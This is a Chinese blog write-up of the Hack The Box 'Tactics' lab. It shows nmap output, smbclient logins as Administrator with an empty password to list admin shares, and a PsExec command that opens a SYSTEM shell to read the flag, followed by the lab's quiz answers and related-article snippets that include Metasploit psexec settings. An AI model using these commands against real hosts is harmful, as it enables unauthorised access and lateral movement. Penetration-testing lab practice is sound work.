HTB_Tactics靶机之smb使用psexec获取shell

已于 2023-02-08 13:33:39 修改
阅读量710 收藏
点赞数
分类专栏: # startpoint 文章标签: linux 安全 运维 网络安全
于 2022-05-30 13:12:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/125044683
版权

很简单的smb重复实践

文章目录

信息收集

日常扫描,和 HTB_Dancing 靶机所涉及的服务一致,上次是讲的 smb 服务

135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?

连接 smb 端口,测试 root 和空密码都报错,百度后说这是因为执行 smbclient 命令的用户 ID 没有成为 samba 服务的用户,我们添加用户名,空密码

┌──(root💀kali)-[~]
└─# smbclient -L 10.129.69.58/WorkShares                                                                                                                               1 ⨯
Enter WORKGROUP\root's password: 
session setup failed: NT_STATUS_IO_TIMEOUT
┌──(root💀kali)-[~]
└─# smbclient -L 10.129.69.58/WorkShares -U Administrator
Enter WORKGROUP\Administrator's password: 
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC

分别连接测试

┌──(root💀kali)-[~]
└─# smbclient //10.129.69.58/ADMIN$ -U Administrator                                                                                                                 130 ⨯
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> ls

实践

话说,这么多文件可不可以搜索呢? 没找到,只能翻,但是还是可以猜测比较常用的敏感文件路径,最后在 C:/Users/Administrator/Desktop 下找到 flag.txt 文件

在这里插入图片描述

里面还提到了一个 PsExec 登录获取 shell 的,这是一个 windows 系统自带的工具,到官网去下载 👉psexec下载-s 是获取管理员权限,成功

PS E:\PSTools> .\PsExec.exe \\10.129.69.58 -u Administrator -s cmd

在这里插入图片描述

使用 type 查看目标文件

在这里插入图片描述

答案

-Pn    //使用禁ping命令扫描
Server Message Block
445
-L
$
C$
get
psexec.py
重返太空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SMB协议利用之-PsExec使用过程介绍
村中少年的专栏
05-09 774
本文介绍psexec的基本功能使用和原理,为后续分析psexecSMB流量分析奠定基础
SMB服务——CTF靶机
panda.
10-19 329
SMB服务 CTF靶机,有想法的可以私信我(有解析有环境) 首先使用fping工具扫描靶机ip 使用nmap工具扫描端口开放状态 使用smbclient工具扫描 连接进入路径 查看文件 下载文件查看wordpress网站的账户密码 使用get指令下载文件 登录网站 使用msfvenom工具生成木马上传到网站中,利用漏洞连接进入靶机 Shell靶机后台即可
SQL注入\工具使用\DC-3靶机信息获取
Chenamao的博客
07-29 449
目录 SQL注入基本方法 1.联合查询 2.报错注入 3.布尔盲注 4.延时注入 SQLMAP 工具 重要常用参数 POST 注入 COOKie 注入 直接GetShell 实验 DC3 获取网站后台管理员帐密并且登录后台 SQL注入基本方法 1.联合查询 由于数据库中的内容会回显到页面中来,所以可以使用联合查询进行注入。 联合查询就是利用 union select 语句,该语句会同时执行两条select语句。 附: 必要条件 两条select 语句查询结果具有...
靶机练习:获取外网getshell进行内网渗透测试
weixin_45906324的博客
11-21 1150
实验靶场联系笔记 文章目录实验靶场联系笔记搭建环境实验工具实验要求实验流程 搭建环境 vmware导入两台靶场并开机,靶机下载地址 https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1 实验工具 VMware® Workstation 15 Pro 版本:15...
如何使用Psexec工具运行命令并获取Shell远程Windows系统?
cunjiu9486的博客
10-10 1717
Windows operating system provides different ways to manage remote systems. Telnet, RDP, VNC are some of them. But these options are generally bound to a graphical user interface. If we prefer a comman...
smb靶场训练
MIGENGKING的博客
06-12 783
静态的标记语言 HTML指的是超文本标记语言(Hyper Text Markip Language),它不是一种编程语言而是一种标记语言,通过使用标签来描述网页。 html: < a href=”链接的地址”>链接文本</> HTML指的是超文本标记语言(Hyper Text Markip Language),它不是一种编程语言而是一种标记语言,通过使用标签来描述网页。 ...
HTB_tools-开源
05-02
Whit htb-tools可以简化上传和下载的带宽分配的配置和监视。
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
python库,解压后可用。 资源全名:htb_cli-0.1.1-py3-none-any.whl
利用共享,smb渗透
baiduxuexin的专栏
11-11 498
exploit/windows/smb/psexec 默认共享:ADMIN$ windows2003: administrator 123456 (192.168.1.3) msfconsole useexploit/windows/smb/psexec set rhost 192.168.1.3 set smbuser administrator set smbpass 12...
CTF之LazySysadmin 靶机渗透(SMB信息泄露)
afei001
04-04 402
SMB介绍     SMB (Server Message Block)通信协议是微软(Microsoft) 和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。     SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application lay...
【内网安全-横向移动】基于SMB协议-PsExec
02-10 8600
【横向移动-基于SMB协议】PsExec
SMB攻击利用之-通过psexec添加用户流量数据包分析
最新发布
村中少年的专栏
05-10 52
本文通过分析已知的PsExec为远端主机添加用户的流量,分析了SMB,DCE/RPC,SVCCTL等多种协议的交互细节,为日常安全运营,护网HVV,重保过程中遇到的关于psexec的流量分析提供参考
横向移动-传递攻击SMB服务利用psexec&smbexec
m0_65096687的博客
05-28 1169
win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码总的来说就是win2012后无法获取明文密码解决办法就是:1.可以利用哈希hash传递(pth,ptk等进行移动)2.利用其他服务协议(SMB,WMI)进行哈希hash移动3.注册表开启wdigest Auth 进行获取明文密码4.利用第三方工具(hashcat)进行破解获取
HTB_Dancing 靶机smb 协议简介
网络安全学习
04-19 3124
文章目录SMB 简介如何使用?ftp 和 smb 的区别 ps:填空答案已在文中标出 SMB 简介 smb 协议,全称 Server Message Block [1] ,是一种在局域网中用于共享文件、打印机和串口的协议 使用 nmap -A 扫描目标主机,查看开放端口,共有 3 个服务, 服务是具体的功能,而协议是规则,注意区分 ┌──(root💀kali)-[~] └─# nmap -A 10.129.107.28 PORT STATE SERVICE VERSION 135/tcp
PsExec使用
weixin_45007073的博客
07-11 7047
PsExec前言攻击过程使用psexec的注意事项Metasploit中的psexec模块 前言 PsExec是SysInternals套件中的一款强大的软件。攻击者通过命令行环境与目标机器进行连接,甚至控制目标机器,而不需要通过远程桌面协议(RDP)进行图形化控制,降低了恶意操作被管理员发现的可能性。 PsExec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为PSEXESVC的二进制文件,然后通过psexec服务运行命令,运行结束后删除任务。 攻击过程 首先我们
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值